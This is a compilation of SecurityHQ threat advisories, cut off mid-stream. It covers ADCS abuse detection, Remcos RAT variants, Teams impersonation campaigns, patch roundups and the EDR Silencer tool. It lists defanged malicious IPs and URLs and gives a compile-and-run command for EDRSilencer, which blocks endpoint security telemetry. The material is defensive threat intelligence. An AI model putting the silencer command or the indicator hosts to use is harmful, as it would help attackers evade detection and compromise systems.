6. Once these TGTs are received the attackers now can authenticate as the domain controller anywhere in the domain as they have NT Hash for the Domain controller machine account, further performing a DC Sync attack to retrieve all the domain hashes. Event Detection Point: Look for Windows Event ID 4662 for an indication of a DC Sync Attack.

Detect ADCS Abuse

To detect ADCS abuse, Windows Events ID needs to be monitored. These include:

• Event ID 4776: The domain controller attempted to validate the credentials for an account. This event can be a valuable indicator for detecting Pass-the-Hash, as it is logged whenever a domain controller (DC) attempts to validate the credentials of an account using NTLM over Kerberos.
• Event ID 4886: Certificate Services received a certificate request. Monitor this event ID for certificate issues for the domain controller.
• Event ID 4887: Certificate Services approved a certificate request and issued a certificate. Monitor this event ID for ADCS issuing a certificate to the requestor.
• Event ID 4768: A Kerberos authentication ticket (TGT) was requested. Monitor this event for a user or computer account that is attempting to authenticate to the domain and obtain access to resources.
• Event ID 4662: An operation was performed on an object. Monitor this event ID for DC Sync Attack which allows attackers to steal credentials by using DSGetNC Changes requests.

Mitigations and Next Steps

1. Disable NTLM Authentication on your Windows domain controller and on any AD CS Servers in your domain.
2. Disable HTTP on AD CS servers. (AD CS Web Enrollment)
3. Enable Extended Protection for Authentication (EPA)
4. Enable detailed logging of certificate requests and enrolments on the CA Server.

For more information about this vulnerability, how it works, and how to protect against it, contact an expert, here.

The post Security Abuse of Misconfigured Active Directory Certificate Services Continue appeared first on SecurityHQ.

Two New Variants of Remcos RAT Identified in Recent Malware Campaigns

Threat Reference: Global

Risks: Malware

Advisory Type: Threats

Priority: Standard

The Remcos Remote Access Trojan (RAT) is a growing cybersecurity threat that primarily spreads through the use of phishing emails containing malicious attachments. Two new variants of the RAT have recently been uncovered. One variant is seen using VBS files to trigger hidden PowerShell scripts to download and execute malicious files. The second variant uses malicious attachments to exploit older vulnerabilities (CVE-2017-11882) in Microsoft Office to install the RAT.

Attack Scenario, Variant 1

1. The VBS file triggers an obfuscated PowerShell script on the victim’s system, which downloads malicious files (e.g., DLL01.txt, Entry.txt) from a command-and-control (C2) server via FTP server or Google Drive.

2. The PowerShell script checks the installed version, and once downloaded, the files are decoded, and the malicious payload is executed. The payload is injected into a legitimate system process, RegAsm.exe, a Microsoft .NET executable file.

3. The Remcos keylogger payload is loaded into memory, and the keylogger monitors the victim’s activity by logging all keystrokes.

4. The malware creates a registry entry under HKCU (HKEY_CURRENT_USER) Run for persistence and a misleading directory in AppData/Local/Microsoft\LocalLow to hide the malicious files from detection.

5. The Captured data, including keystrokes, is stored in %ProgramData%\1210\logs.dat and exfiltrated to the C2 server. The malware maintains continuous communication with the C2 server, which can deliver payloads, receive stolen data, or issue commands to control the system.

Attack Scenario, Variant 2

1. This variant is delivered through a spam email with a malicious Office Open XML Document (.docx) file.

2. The document is an RTF file with a long filename, designed to trick the victim into opening it.

3. The document contains a reference to an external URL, which downloads an RTF file exploiting the CVE-2017-11882 vulnerability in Microsoft Equation Editor, allowing remote code execution.

4. The RTF file downloads a highly obfuscated VBS script. The payload includes a .NET DLL (dnlib.dll), which is loaded into memory via PowerShell without writing to disk to evade detection. After that, the Remcos RAT follows the usual malicious activities.

Indicators of compromise (IOCs). Domains/URLs:

• dealc[.]me/NLizza
• raw[.]githubusercontent[.]com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V[.]txt
• 91[.]134[.]96[.]177/70/RGGFVC[.]txt
• 91[.]134[.]96[.]177/70/picturewithmegetbacktouse[.]tIF

Recommendations

1. Implement Multi-Factor Authentication to significantly reduce the risk of successful login attempts using stolen credentials.
2. Deploy Endpoint Detection and Response (EDR) solutions to help identify and respond to suspicious activity, potentially stopping ransomware deployment.
3. Regular data backups stored securely offline are essential for recovery in case of a ransomware attack.
4. Prioritize and apply security patches promptly to address vulnerabilities that attackers can exploit.
5. Educate employees to identify phishing attempts and other social engineering tactics used to gain initial access.
6. Regular Security Assessments Conduct regular security assessments to identify and address potential weaknesses in your IT infrastructure.

71 Vulnerabilities, Including 30 Remote Code Execution Flaws in Microsoft’s Dec Patch Tuesday

Threat Reference: Global

Risks: Remote Code Execution, Privilege Escalation, Security Feature Bypass, Information Disclosure, Denial of Service, and Spoofing

Advisory Type: Updates/Patches

Priority: Standard

Microsoft has released its Patch Tuesday for December 2024, addressing 71 security vulnerabilities, including one zero-day and 30 remote code execution vulnerabilities.

Successful exploitation of these vulnerabilities could lead to remote code execution, privilege escalation, security feature bypass, information disclosure, denial of service, and spoofing.

Affected products include Microsoft Office, Microsoft Edge, Microsoft Defender for Endpoint, Microsoft Office SharePoint, Microsoft Office Word, Windows Task Scheduler, Windows Resilient File System (ReFS), and GitHub.

Notable CVEs Include:

• [Zero-Day] – CVE-2024-49138 – Windows Common Log File System Driver Elevation of Privilege Vulnerability
• [Critical] – CVE-2024-49115 – Windows Remote Desktop Services Remote Code Execution Vulnerability
• [Critical] – CVE-2024-49116 – Windows Remote Desktop Services Remote Code Execution Vulnerability
• [Critical] – CVE-2024-49117 – Windows Hyper-V Remote Code Execution Vulnerability
• [Critical] – CVE-2024-49118 – Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability
• [Critical] – CVE-2024-49119 – Windows Remote Desktop Services Remote Code Execution Vulnerability
• [Critical] – CVE-2024-49120 – Windows Remote Desktop Services Remote Code Execution Vulnerability
• [Critical] – CVE-2024-49122 – Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability
• [Critical] – CVE-2024-49123 – Windows Remote Desktop Services Remote Code Execution Vulnerability
• [Critical] – CVE-2024-49124 – Lightweight Directory Access Protocol (LDAP) Client Remote Code Execution Vulnerability
• [Critical] – CVE-2024-49126 – Windows Local Security Authority Subsystem Service (LSASS) Remote Code Execution Vulnerability
• [Critical] – CVE-2024-49127 – Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability
• [Critical] – CVE-2024-49128 – Windows Remote Desktop Services Remote Code Execution Vulnerability
• [Critical] – CVE-2024-49132 – Windows Remote Desktop Services Remote Code Execution Vulnerability
• [Critical] – CVE-2024-49106 – Windows Remote Desktop Services Remote Code Execution Vulnerability
• [Critical] – CVE-2024-49108 – Windows Remote Desktop Services Remote Code Execution Vulnerability
• [Critical] – CVE-2024-49112 – Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability

View the full list, here.

Recommendations

Update all affected products to the latest available patch version.

SecurityHQ Recommendation for Microsoft Default Teams External Access Hardening – Addendum

Threat Reference: Global

Risks: Threats

Advisory Type: Phishing, Spoofing, Ransomware

Priority: Standard

While this advisory revisits insights shared in November 2024, it reflects new campaign developments observed since October 2024, necessitating immediate review and enhancement of security settings.

SecurityHQ has observed a resurgence in targeted social engineering attacks exploiting Microsoft Teams’ external access settings. Threat actors such as Storm-1811 and Black Basta are leveraging these settings to initiate contact with victims, using display names like “Help Desk Manager” or impersonating internal IT staff. After gaining the victim’s trust, attackers manipulate them into downloading remote desktop tools such as AnyDesk, Quick Assist, or TeamViewer, enabling unauthorized system access and further malicious activity.

By default, Microsoft Teams allows external users to initiate chats and share files with corporate accounts. This configuration is exploited by these actors to execute sophisticated attacks.

Key Threat Actor Tactics

• Storm-1811

1. Initial Contact: Floods the victim’s inboxes with spam (email bombing) to create urgency.

2. Impersonation: Poses as an IT administrator via Microsoft Teams or phone calls.

3. Exploitation: Guides users to install RMM tools and establishes SSH tunnel backdoors for persistence and reconnaissance.

• Black Basta

1. Initial Contact: Overloads inboxes with spam and follows up via Teams, impersonating IT staff.

2. Credential Harvesting: Deploys obfuscated malware (e.g., Zbot, DarkGate) and custom harvesters for rapid credential theft.

3. Payload Delivery: Uses compromised cloud services or direct uploads to deploy ransomware payloads.

Risk and Exploits

While Microsoft Teams requires users to accept chat requests before viewing messages from external accounts, this safeguard is easily bypassed through spoofed corporate accounts, urgent scenarios, and trusted source impersonation.

The SecurityHQ team has also added recently observed Indicators of Compromise (IOCs) related to the Abuse of Teams External Access Feature in an internal investigation.

Indicators of compromise (IOCs). IP Addresses:

• 185[.]130[.]47[.]96
• 65[.]87[.]7[.]151
• 66[.]78[.]40[.]86
• 184[.]174[.]97[.]32
• 212[.]232[.]22[.]140
• 8[.]209[.]111[.]227
• 8[.]211[.]34[.]166
• 109[.]172[.]88[.]38
• 109[.]172[.]87[.]135
• 188[.]130[.]206[.]243
• 46[.]8[.]232[.]106
• 46[.]8[.]236[.]61
• 91[.]212[.]166[.]91
• 93[.]185[.]159[.]253
• 94[.]103[.]85[.]114
• 193[.]29[.]13[.]60
• 88[.]214[.]25[.]32
• 147[.]28[.]163[.]206
• 45[.]61[.]152[.]154
• 185[.]229[.]66[.]224
• 172[.]81[.]60[.]122
• 145[.]223[.]116[.]66
• 185[.]238[.]169[.]17
• 179[.]60[.]149[.]194
• 178[.]236.247[.]173
• 38[.]180.192[.]243
• 45[.]8.157[.]162
• 45.8[.]157.158
• 178.236[.]247.173
• 195[.]123.233[.]148
• 89[.]185.80[.]170
• 195.211[.]96.135

Domains/URLs:

• youadmin.onmicrosoft[.]com
• delparqueflats[.]com
• bilipow.onmicrosoft[.]com
• brandonsupport.onmicrosoft[.]com
• cofincafe[.]com
• cybersecurityadmin.onmicrosoft[.]com
• cybershieldassist.onmicrosoft[.]com
• databreachsupport.onmicrosoft[.]com
• endpointshield.onmicrosoft[.]com
• eps.udg.edu
• filtrocorp[.]com
• helpadministrator.onmicrosoft[.]com
• itsecurityassistance.onmicrosoft[.]com
• itusaacademy[.]com
• malwareremovalassistance.onmicrosoft[.]com
• networksecuritymonitoring.onmicrosoft[.]com
• pereirabrito[.]com.br
• safesoc.onmicrosoft[.]com
• securitypatching.onmicrosoft[.]com
• servicedeskadmin.onmicrosoft[.]com
• spamprotectionmanager.onmicrosoft[.]com
• spamprotections.onmicrosoft[.]com
• supporthelper.onmicrosoft[.]com
• supporthelpspam.onmicrosoft[.]com
• supportteamsservice.onmicrosoft[.]com
• llladminllll.onmicrosoft[.]com
• hegss.onmicrosoft[.]com
• llladminhlpll.onmicrosoft[.]com
• 1helpyou.onmicrosoft[.]com
• truehalp.onmicrosoft[.]com
• adminsteams.onmicrosoft[.]com
• asssistingyou.onmicrosoft[.]com
• suporting.onmicrosoft[.]com
• hprsynergyengineering.onmicrosoft[.]com
• bevananda[.]com
• sslip[.]io
• *.doc[.]docu-duplicator[.]com
• *.doc1[.]docu-duplicator[.]com
• *.doc2[.]docu-duplicator[.]com
• dns[.]winsdesignater[.]com
• crystallakehotels[.]com
• summerrain[.]cloud
• mailh[.]org
• file[.]io
• bigdealcenter[.]world
• brownswer[.]com
• blazingradiancesolar[.]com
• posetoposeschool[.]com
• arifgrouporg-my[.]sharepoint[.]com
• binusianorg-my[.]sharepoint[.]com
• dropmeafile[.]com

Recommendations

Kindly check if your current team’s external access settings allow external users to initiate chat messages. It is highly recommended to restrict access to external users.

Step 1: Log in to the Microsoft Teams admin center.

Step 2: Go to the external access setting and scroll down.

Step 3: Unchecked to People In my org can communicate with Teams users whose accounts aren’t managed by an organization.

Step 4: Click on save and confirm the changes.

Once you are done with changes, it will take some time to reflect changes

Ivanti Patched Multiple Critical and High-Severity Vulnerabilities

Threat Reference: Global

Risks: Arbitrary File Deletion, Unauthorized access, Remote code execution, Denial of Service

Advisory Type: Updates/Patches

Priority: Standard

SecurityHQ has observed that Ivanti has released multiple high and critical severity vulnerabilities affecting multiple Ivanti Products. Successful exploitation of these vulnerabilities may allow an attacker to perform Arbitrary File Deletion, Unauthorized access, Remote code execution, and Denial of Service (DOS) attacks.

Affected Products include Ivanti Cloud Services Application (CSA), Ivanti Desktop and Server Management (DSM), Ivanti Policy Secure (IPS), Ivanti Connect Secure (ICS), Ivanti Sentry, Ivanti Endpoint Manager, Ivanti Security Controls, Ivanti Patch for Configuration Manager, Ivanti Neurons for Patch Management, and Ivanti Neurons Agent Platform.

Notable CVE’s:

• [Critical] CVE-2024-11633- Argument injection in Ivanti Connect Secure before version 22.7R2.4 allows a remote authenticated attacker with admin privileges to achieve remote code execution
• [Critical] CVE-2024-11634- Command injection in Ivanti Connect Secure before version 22.7R2.3 and Ivanti Policy Secure before version 22.7R1.2 allows a remote authenticated attacker with admin privileges to achieve remote code execution.
• [Critical] CVE-2024-11639 – An authentication bypass in the admin web console of Ivanti CSA before 5.0.3 allows a remote unauthenticated attacker to gain administrative access
• [Critical] CVE-2024-11772 – Command injection in the admin web console of Ivanti CSA before version 5.0.3 allows a remote authenticated attacker with admin privileges to achieve remote code execution.
• [Critical] CVE-2024-11773 – SQL injection in the admin web console of Ivanti CSA before version 5.0.3 allows a remote authenticated attacker with admin privileges to run arbitrary SQL statements.

SecurityHQ was not able to identify any evidence of these vulnerabilities being exploited in the wild nor any association with the Advanced Persistent Threat (APT) group or malware variant.  

Recommendation

Update all the affected products to the latest available patch version.

Adobe Released Security Updates to Address 161 Security Vulnerabilities Across Products with Critical and Important Severity.

Threat Reference: Global

Risks: Cross-site Scripting (XSS), Stack-Bases, Heap-based Buffer Overflow and Improper Input Validation.

Advisory Type: Updates/Patches

Priority: Standard

Adobe has released its Patches, addressing a total 161 of new security vulnerabilities across multiple Adobe Products. Out of which 45 are critical vulnerabilities and 116 are important vulnerabilities. These updates aim to mitigate vulnerabilities that could allow attackers to attempt Cross-site Scripting (XSS), stack bases, Heap-based Buffer overflow, and Improper input validation.

Affected Products include Adobe Experience Manager (AEM), Acrobat DC, Acrobat Reader DC, Acrobat 2024, Acrobat 2020, Acrobat Reader 2020, Adobe Media Encoder, Adobe After Effects, Adobe Animate 2023, Adobe Animate 2024, Adobe InDesign, Adobe PDFL Software Development Kit (SDK), Adobe Connect, Adobe Substance 3D Sampler, Photoshop 2025, Adobe Bridge, Adobe Premiere Pro, Adobe Substance 3D Painter, and Adobe FrameMaker.

Recommendation

Update all the affected products to the latest available patch version.

Threat Intelligence for the Future

SecurityHQ’s Threat Intelligence team is a cohesive global unit dedicated to Cyber Threat Intelligence. Our team is focused on researching emerging threats and tracking activities of threat actors, ransomware groups, and campaigns, to ensure that they stay ahead of potential risks. Beyond their investigative work, the Intelligence team provides actionable threat intelligence and research, enriching the understanding of SecurityHQ’s customers worldwide. United by a common commitment, the SecurityHQ Threat Intelligence team delivers the insights needed to confidently navigate the intricacies of the cyber security threat landscape.

For more information on these threats, speak to an expert here. Or if you suspect a security incident, you can report an incident here.

The post December 2024 Threat Advisory – Top 5 appeared first on SecurityHQ.

The Emergence of Interlock Ransomware

Threat Reference: Global

Risks: Ransomware

Advisory Type: Threats

Priority: Standard

SecurityHQ has identified the emergence of a new ransomware strain, Interlock. This ransomware targets Windows systems and is known for its stealthy operations and methodical approach to encrypting files. After gaining initial access through phishing emails containing malicious links, Interlock utilizes ransom notes that threaten to expose sensitive information unless a ransom is paid. The malware then encrypts files and appends specific file extensions to indicate encryption, whilst employing a sophisticated blend of evasion techniques to avoid detection.

Interlock ransomware is believed to have originated from a Russian-speaking cybercrime group. The attack vectors and deployment methods indicate that the threat actors behind Interlock are experienced and familiar with various ransomware distribution strategies. While the precise origins and initial release timeline remain unclear, the ransomware has been observed spreading in targeted campaigns against high-value organizations.

Affected Products include Windows operating systems, Microsoft Office documents, databases, image formats, financial institutions, healthcare organizations, and Government entities.

Recommendations:

SecurityHQ has identified several measures to reduce risk such as implementing Multi-Factor Authentication, deploying Endpoint Detection and Response solutions, regular data backups, addressing vulnerabilities, educating employees, and regular security assessments.

Adobe Released Security Updates to Patch Multiple Critical and Important Severity Vulnerabilities across Adobe Products

Threat Reference: Global

Risks: Arbitrary Code Execution, Memory Leak, Application Denial-of-Service

Advisory Type: Updates/Patches

Priority: Standard

Adobe has released security updates to fix multiple critical severity vulnerabilities across its products. Successful exploitation of these vulnerabilities poses the risk of Memory Leak, Arbitrary Code Execution, and Application denial-of-service.

Affected products include Adobe After Effects, Adobe Substance 3D Painter, Adobe Illustrator, Adobe InDesign, Adobe Photoshop, and Adobe Commerce.

Notable CVEs:

• [Critical] CVE-2024-47441- Out-of-bounds Write – Software error that can occur when reading data from memory. These errors can lead to crashes or other unexpected vulnerabilities, that may allow an attack to read sensitive information.

• [Critical] CVE-2024-49521- Server-Side Request Forgery (SSRF) – A web security vulnerability that allows an attacker to cause an application to make requests to an unintended application.

• [Critical] CVE-2024-49525- Heap-based Buffer Overflow – Buffer Overflows are particularly vulnerable to threat actors attempting to corrupt data and disrupt operations.

Recommendations:

Update all affected products to the latest available patch version.

Joint Agency Advisory: Increased Threat of Zero-Day Exploits Targeting Enterprise Vulnerabilities

Threat Reference: Global

Risks: Code Injection, Privilege Escalation, Heap-Based Buffer Overflow, SQL Injection, Remote Code Execution

Advisory Type: Updates/Patches

Priority: Standard

In a joint advisory published by NCSC, CISA, and allied agencies, experts warn of a surge in cyber attackers, including state-sponsored and financially motivated groups, exploiting zero-day vulnerabilities. Both newly disclosed and known vulnerabilities are being rapidly weaponized, making unpatched systems particularly vulnerable.

Agencies note a shift toward swift exploitation tactics and are advising organizations to bolster defenses by promptly patching and reducing their attack surfaces. Key industries such as government, finance, and critical infrastructure are primary targets.

Notable CVEs

• CVE-2021-44228 (“Log4Shell”): RCE in Apache Log4j, highly exploited – Attackers submit requests causing systems to execute arbitrary code allowing them to take full control of the system, steal information, launch ransomware, and more.
  
  
• CVE-2019-0708 (“BlueKeep”): RCE in Windows RDP, critical impact – security vulnerability discovered in Windows operating systems that allows for the possibility of remote code execution – allowing attackers full control over systems.
  
  
• CVE-2020-1472 (“Zerologon”): Domain admin access in Microsoft Netlogon. – Attackers gain access to systems via brute-force-attack against Netlogon exploiting a flaw in the system in which 1 in every 256 codes yields a ciphertext of only zeros.

Visit here for the full list.

Recommendations:

Update all the affected products to the latest available patch version.

Microsoft Released its November 2024 Patch Tuesday for 91 Flaws Including 04 Zero-Days and 52 Remote Code Execution Vulnerabilities

Threat Reference: Global

Risks: Remote Code Execution, Elevation of Privilege, Security Feature Bypass, Information Disclosure, Denial of Service and Spoofing

Advisory Type: Updates/Patches

Priority: Standard

Microsoft has released its Patch Tuesday for November 2024, with security updates for 91 flaws, including 04 actively exploited and 52 Remote Code Execution Vulnerabilities. Successful exploitation of these vulnerabilities could result in Elevation of Privilege, Security Feature Bypass, Remote Code Execution, Information Disclosure, Denial of Service, and Spoofing.

Affected Products include .NET and Visual Studio, Airlift.microsoft.com, Azure CycleCloud, LightGBM, Microsoft Defender for Endpoint, Microsoft Edge (Chromium-based), Microsoft Exchange Server, Microsoft Graphics Component, Microsoft Office Excel, Microsoft Office Word, Microsoft PC Manager, Microsoft Virtual Hard Drive, Microsoft Windows DNS, Role: Windows Active Directory Certificate Services, Role: Windows Hyper-V, SQL Server, TorchGeo, Visual Studio, Visual Studio Code, Windows CSC Service, Windows Defender Application Control (WDAC), Windows DWM Core library, Windows Kerberos, Windows Kernel, Windows NT OS Kernel, Windows NTLM, Windows Package Library Manager, Windows Registry, Windows Secure Kernel Mode, Windows SMB, Windows SMBv3 Client/Server, Windows Task Scheduler, Windows Telephony Service, Windows Update Stack, Windows USB Video Driver, Windows VMSwitch, and Windows Win32 Kernel Subsystem.

Notable CVEs:

• [Zero-Day] – [Important] – CVE-2024-43451 – NTLM Hash Disclosure Spoofing Vulnerability – Enables an attacker to authenticate as a user after only minimal interaction, such as opening a malicious file.

• [Critical] – CVE-2024-43498 – .NET and Visual Studio Remote Code Execution Vulnerability – attackers able to exploit vulnerabilities by sending crafted requests to .NET vulnerable webapp, or loading a specifically crafted file into the application.

• [Critical] – CVE-2024-43639 – Windows Kerberos Remote Code Execution Vulnerability – Critical vulnerability that allows attackers to send crafted requests to vulnerable systems to gain unauthorized access and execute arbitrary code on affected systems.

Recommendations:

Update all affected products to the latest available patch version.

Fortinet Patches Critical Vulnerabilities

Threat Reference: Global

Risks: Privilege Escalation, Arbitrary Code Execution and Unauthorized Session Hijacking

Advisory Type: Updates/Patches

Priority: Standard

Fortinet has released patches to address high-severity vulnerabilities affecting its products. Successful exploitation of these vulnerabilities could result in Privilege Escalation, Arbitrary Code Execution, and Unauthorized Session Hijacking.

Affected products include FortiClientWindows, FortiAnalyzer, FortiAnalyzer-BigData, FortiManager, FortiManager Cloud, FortiOS

Notable CVEs:

• [Critical] – CVE-2024-47575 – A missing authentication vulnerability in the FortiManager daemon may permit a remote, unauthenticated attacker to execute arbitrary code or commands through crafted requests.

• [High] – CVE-2024-36513 – A privilege context switching error vulnerability in FortiClient for Windows may enable an authenticated user to gain elevated privileges by exploiting Lua auto-patch scripts.

• [High] – CVE-2024-23666 – A client-side implementation of a server-side security vulnerability in FortiAnalyzer could allow an authenticated attacker with read-only access to carry out sensitive operations through crafted requests.

Recommendations:

Update all affected products to the latest available patch version.

Threat Intelligence for the Future

SecurityHQ’s Threat Intelligence team is a cohesive global unit dedicated to Cyber Threat

Intelligence. Our team is focused on researching emerging threats and tracking activities of threat actors, ransomware groups, and campaigns, to ensure that they stay ahead of potential risks. Beyond their investigative work, the Intelligence team provides actionable threat intelligence and research, enriching the understanding of SecurityHQ’s customers worldwide. United by a common commitment, the SecurityHQ Threat Intelligence team delivers the insights needed to confidently navigate the intricacies of the cyber security threat landscape.

For more information on these threats, speak to an expert here. Or if you suspect a security incident, you can report an incident here.

The post November 2024 Threat Advisory – Top 5 appeared first on SecurityHQ.

The EDR Silencer represents a notable tool that is publicly available via open source on GitHub.

Originally developed within Night Hawk, a command-and-control (C2) framework marketed by MDSec Labs, this tool’s capabilities were initially forged.

The fundamental concept of this offensive instrument involves leveraging the Windows Filtering Platform, a built-in suite of system services present in Windows operating systems from Vista 7 onward. The primary purpose here is to obstruct EDR systems from establishing internet communications.

Historically, the Windows Filtering Platform was designed for utilization by security applications such as firewalls, antimalware software, and similar protective solutions.

A Deep Dive on how EDR Silencer Operates

The code harnesses the capabilities of the Windows Filtering Platform (WFP) to dynamically ascertain the processes associated with active EDR solutions, subsequently configuring WFP filters that impede their outbound network traffic across both IPv4 and IPv6 protocols. This sophisticated mechanism effectively disrupts the ability of EDR systems to relay telemetry and alerts to their management consoles, thereby undermining their operational effectiveness.

The command in question simultaneously executes the compilation of the code and initiates the EDRSilencer.exe application, which is engineered to intercept and block any outbound communication directed toward the management console.

x86_64-w64-mingw32-gcc EDRSilencer.c utils.c -o EDRSilencer.exe -lfwpuclnt

EDRSilencer.exe blocked

Figure 1: EDR Silencer Initiating EDR Blocking. Source: SecurityHQ Threat Labs

This is a WFP (Windows Filtering Platform) filter that shows a custom outbound filter created by this execution to block outbound traffic. It has been set as a persistent filter.

Figure 2: Windows Filtering Platform Event on the Host. Source: SecurityHQ Threat Labs

Detection

Event Source: Microsoft Windows Security Event Log

Event Category: Process Creation and Success Audit

Event Name: Process creation followed by Success Audit: A Windows Filtering Platform filter has been changed.

Event ID: 5447

Detection and Alerting Parameters: Configurable conditions to tune alert generation include.

Change Information: <Delete/Add>

Filter Information:<Name>

Filter Information:<Persistent>

Layer Information: <Name>

Additional Information: <Filter Action>

These parameters allow for comprehensive monitoring and alerting on activities involving changes to Windows Filtering Platform filters, specifically restricted to known custom outbound filter additions.

Figure 3: Custom Parameters. Source: SecurityHQ Threat Labs

SecurityHQ Recommendations

Restricting Portable Executables

Prevent executables from running in commonly used directories, like Downloads, Desktop, and Temp. Policies in Group Policy Object (GPO) or AppLocker can block execution from these directories. This approach stops users from inadvertently launching unapproved portable executables directly from common folders.

Group Policy Object (GPO) Restrictions

Configure Group Policies to prevent access to specific command-line interpreters.

• Disable PowerShell: Set policies to restrict powershell.exe and powershell_ise.exe, or configure PowerShell Constrained Language Mode to limit available commands and prevent script execution.
• Block Command Prompt: GPO allows blocking of cmd.exe for non-admin users by navigating to User Configuration > Administrative Templates > System and enabling “Prevent access to the command prompt.

Application Whitelisting and Software Restriction Policies (SRP)

Use tools like Microsoft AppLocker or SRP to restrict access to GCC binaries. Configure rules that allow GCC only on machines designated for development. AppLocker can target applications based on user roles, so non-developer machines won’t have the permissions to execute the compiler.

Principle of Least Privilege

Mandate that all users and applications are endowed solely with the minimal degree of access indispensably necessary for the execution of their designated functions.

For more information about this vulnerability, how it works, and how to protect against it, contact an expert, here.

The post What is an Endpoint Detection & Response (EDR) Silencer? appeared first on SecurityHQ.

Ivanti Patches Multiple Vulnerabilities in Cloud Service Applications (CSA) Exploited in the Wild

SecurityHQ has observed that Ivanti has released multiple vulnerabilities classified as critical, high, and medium severity, affecting Ivanti CSA (Cloud Services Application). Successful exploitation of these vulnerabilities could allow an authenticated attacker to perform Remote Code Execution, Privilege Escalation, and SQL injection. Affected versions include Cloud Services Application (CSA) before 4.6 versions.

Notable CVEs:

• [Critical]- CVE-2024-8963 – Successful exploitation could allow a remote unauthenticated attacker to access restricted functionality.
• [High]- CVE-2024-9380 – An OS command injection vulnerability in the admin web console of Ivanti CSA allows a remote authenticated attacker with admin privileges to obtain remote code execution.
• [High]- CVE-2024-9381 – Path traversal vulnerability which allows an attacker with admin privileges to manipulate file paths in a way that can bypass access controls or restrictions.
• [Medium]- CVE-2024-9379 – SQL injection in the admin web console of Ivanti CSA allows a remote authenticated attacker with admin privileges to run arbitrary SQL statements.

If CVE-2024-8963 is used in conjunction with CVE-2024-8190 an attacker can bypass admin authentication and execute arbitrary commands on the appliance.

Recommendation

Update the Ivanti Cloud Services Appliance (CSA) to 5.0.

Palo Alto has Released a Security Update to Fix Critical & High Severity Vulnerabilities

Palo Alto has released security updates to fix multiple critical and high-severity vulnerabilities in the Expedition tool. These vulnerabilities allow attackers to read expedition database contents and arbitrary files, as well as write arbitrary files to temporary storage locations on the system. The exposed information includes usernames, cleartext passwords, device configurations, and API keys for PAN-OS firewalls.

Affected products include the PaloAlto Networks expedition tool.

Notable CVEs:

• [Critical] – CVE-2024-9463 – An OS command injection vulnerability in Palo Alto Networks Expedition allows an unauthenticated attacker to run arbitrary OS commands as root in Expedition, resulting in disclosure of usernames, cleartext passwords, device configurations, and device API keys of PAN-OS firewalls.

• [Critical] – CVE-2024-9464 – An OS command injection vulnerability in Palo Alto Networks Expedition allows an authenticated attacker to run arbitrary OS commands as root in Expedition, resulting in disclosure of usernames, cleartext passwords, device configurations, and device API keys of PAN-OS firewalls.

• [Critical] – CVE-2024-9465 – An SQL injection vulnerability in Palo Alto Networks Expedition allows an unauthenticated attacker to reveal Expedition database contents, such as password hashes, usernames, device configurations, and device API keys. With this, attackers can also create and read arbitrary files on the Expedition system.

• [High] – CVE-2024-9466 – A cleartext storage of sensitive information vulnerability in Palo Alto Networks Expedition allows an authenticated attacker to reveal firewall usernames, passwords, and API keys generated using those credentials.

• [High] – CVE-2024-9467 – A reflected XSS vulnerability in Palo Alto Networks Expedition enables execution of malicious JavaScript in the context of an authenticated Expedition user’s browser if that user clicks on a malicious link, allowing phishing attacks that could lead to Expedition browser session theft.

SecurityHQ has identified proof-of-concept exploits published on 10th October 2024 for the CVE-2024-9464 which have a CVSS score of 9.3, indicating critical severity. However, no active exploitation or association with threat actors or malware variants has been observed.

Recommendation

Update to Expedition version 1.2.96 or later. After upgrading to the fixed version of Expedition, all Expedition usernames, passwords, and API keys should be rotated. Additionally, all firewall usernames, passwords, and API keys processed by Expedition should be rotated. The cleartext file affected by CVE-2024-9466 will be automatically removed during the upgrade.

Cisco Releases Security Updates to Patch Critical and High-Severity Vulnerabilities

SecurityHQ has observed that Cisco has released security updates to address Critical and high-severity vulnerabilities across several of its products. Successful exploitation of these vulnerabilities could result in remote code execution, privilege escalation, arbitrary code execution, and exposure of sensitive information.

Affected Products include Cisco NDFC, Cisco RV340 Dual WAN Gigabit VPN Routers, Cisco RV340W Dual WAN Gigabit Wireless-AC VPN Routers, Cisco RV345 Dual WAN Gigabit VPN Routers, and Cisco RV345P Dual WAN Gigabit PoE VPN Routers.

Notable CVEs:

• [Critical] – CVE-2024-20432: A vulnerability in Cisco Nexus Dashboard Fabric Controller (NDFC) allows low-privileged, authenticated attackers to perform command injection via the REST API or web UI. This is due to improper authorization and command validation, enabling arbitrary command execution with network admin privileges

• [High] – CVE-2024-20449 – A vulnerability in Cisco Nexus Dashboard Fabric Controller (NDFC) allows authenticated, low-privileged remote attackers to successfully execute arbitrary code due to improper path validation. Attackers can exploit this by using path traversal techniques to upload malicious code via Secure Copy Protocol (SCP), enabling code execution in a specific container with root privileges.

• [High] – CVE-2024-20393: A vulnerability in Cisco Small Business RV340, RV340W, RV345, and RV345P routers’ web management interface could allow an authenticated, remote attacker to elevate privileges. This vulnerability exists due to sensitive information disclosure. A successful exploit could allow an attacker to elevate privileges from guest to admin.

• [High] – CVE-2024-20470: A vulnerability in Cisco Small Business RV340, RV340W, RV345, and RV345P routers’ web management interface allows an authenticated, remote attacker with admin credentials to execute arbitrary code. This occurs due to insufficient input validation. A successful exploit could enable arbitrary code execution as the root user on the underlying system.

SecurityHQ was not able to observe any evidence of this vulnerability being exploited in the wild nor any association with malware variant or Threat Actors.

Recommendation

Update all the affected products to the latest available patch version.

Oracle Released a Critical Patch Update for October 2024

Oracle has released its quarterly Critical Patch Update, addressing a total of 334 new security patches across multiple Oracle product families. These updates aim to mitigate vulnerabilities that could allow attackers to remotely execute code, escalate privileges, denial of service, information disclosure, cross-site scripting, or gain unauthorized access to systems.

Out of all security patches, 29 vulnerabilities were identified for Oracle Access Manager, 27 vulnerabilities for Oracle E-Business Suite, followed by Oracle Database Server and Oracle Fusion Middleware with 23 and 24 vulnerabilities, respectively.

Affected Products include Oracle Fusion Middleware, Oracle Communications, Oracle MySQL, Oracle Financial Services, Oracle Database Server, Oracle E-Business Suite, Oracle Java SE, Oracle PeopleSoft, Oracle Enterprise Manager, Oracle GoldenGate, Oracle Health Sciences, Oracle JD Edwards, Oracle Utilities Applications, Oracle Retail Applications, Oracle Virtualization, Oracle Secure Backup, Oracle Construction and Engineering, Oracle Hospitality, Oracle Policy Automation, Oracle NoSQL Database, and Oracle Systems.

Recommendation

